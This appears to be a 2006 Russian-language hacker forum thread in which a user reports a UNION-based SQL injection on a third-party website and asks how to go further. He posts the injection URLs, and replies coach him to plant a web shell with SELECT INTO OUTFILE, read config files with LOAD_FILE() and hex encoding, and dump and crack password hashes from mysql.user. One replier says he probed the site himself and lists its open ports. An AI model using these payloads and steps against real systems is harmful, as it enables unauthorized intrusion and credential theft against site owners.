SQL Inj
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя |
Сообщение |
<< Старые топики Новые топики >> |
|
|
SQL Inj - 2006-10-21 19:56:04.163333
|
|
|
Solker
Сообщений: 13
Оценки: 0
Присоединился: 2005-04-15 12:33:47
|
Вот порыл тут сайт один, нашел там что то похожее не инжектион но, ошибку саму он не выдает но инжектион проходит. Пишу вот это: http://www.site.ru/site/index.php?sys_page=main&sys_link=2&sys_blok=2&news_id=-1%20UNION%20select%201,2,3,4%20from%20mysql.user/* Он мне выводит 3 4 Вообщем вот что узнал User admin@wizard.dataforce.net database am-group version 4.0.18-1.gm-log user admin Пишу http://www.site.ru/site/index.php?sys_page=main&sys_link=2&sys_blok=2&news_id=-1%20UNION%20select%201,2,password,4%20from%20mysql.user/* так он мне ничего не выдает… просто пусто, не знаю что делать. Подскажите что дальше делать чтоль…
|
|
|
RE: SQL Inj - 2006-10-21 20:34:00.850000
|
|
|
Сhaos_Сode
Сообщений: 1049
Оценки: 0
Присоединился: 2006-01-12 11:54:12
|
попробуй загрузить шелл(load into output file), прочитать файл конфига(LOAD_FILE(), у MySQL богатые возможности, если конечно это не запрещено. Какие точно составить запрос не скажу. Чтоб сам учился. еще возможно придется юзать char() и перекодировать адреса файлов в 16ю кодировку. Это может быть нужно для LOAD_FILE. С 1-м бывает чертовски необходимо но не работает.
|
|
|
RE: SQL Inj - 2006-10-21 22:20:00.443333
|
|
|
Solker
Сообщений: 13
Оценки: 0
Присоединился: 2005-04-15 12:33:47
|
>попробуй загрузить шелл(load into output file) Я что то на сайте мускула в мануле не смог найти ничего по Load into. >Lodas_File но я же ведь не знаю полный путь… это раз. А чтоб перекодировать ее я понимаю это надо перекодировать в что то типа 0x123jd73d73…?
|
|
|
RE: SQL Inj - 2006-10-21 22:22:17.446666
|
|
|
AdReNaL1Ne
Сообщений: 8027
Оценки: 350
Присоединился: 2005-09-11 06:38:05
|
Не Load into а select into
|
|
|
RE: SQL Inj - 2006-10-21 23:47:49.633333
|
|
|
Dimonelite
Сообщений: 348
Оценки: 0
Присоединился: 2005-12-05 20:55:07
|
зашел на тот сайт, посмотрел, sql-injection действительно есть. пиши union select 1,2,user,password from mysql.user LIMIT 0,1 потом LIMIT 1,1. возьмешь хеш юзера admin, расшифруешь, и может быть он куда-нибудь подойдет. порт mysql фильтруется, как и все остальные кроме 80,443,8080, везде висит апач
|
|
|
|
|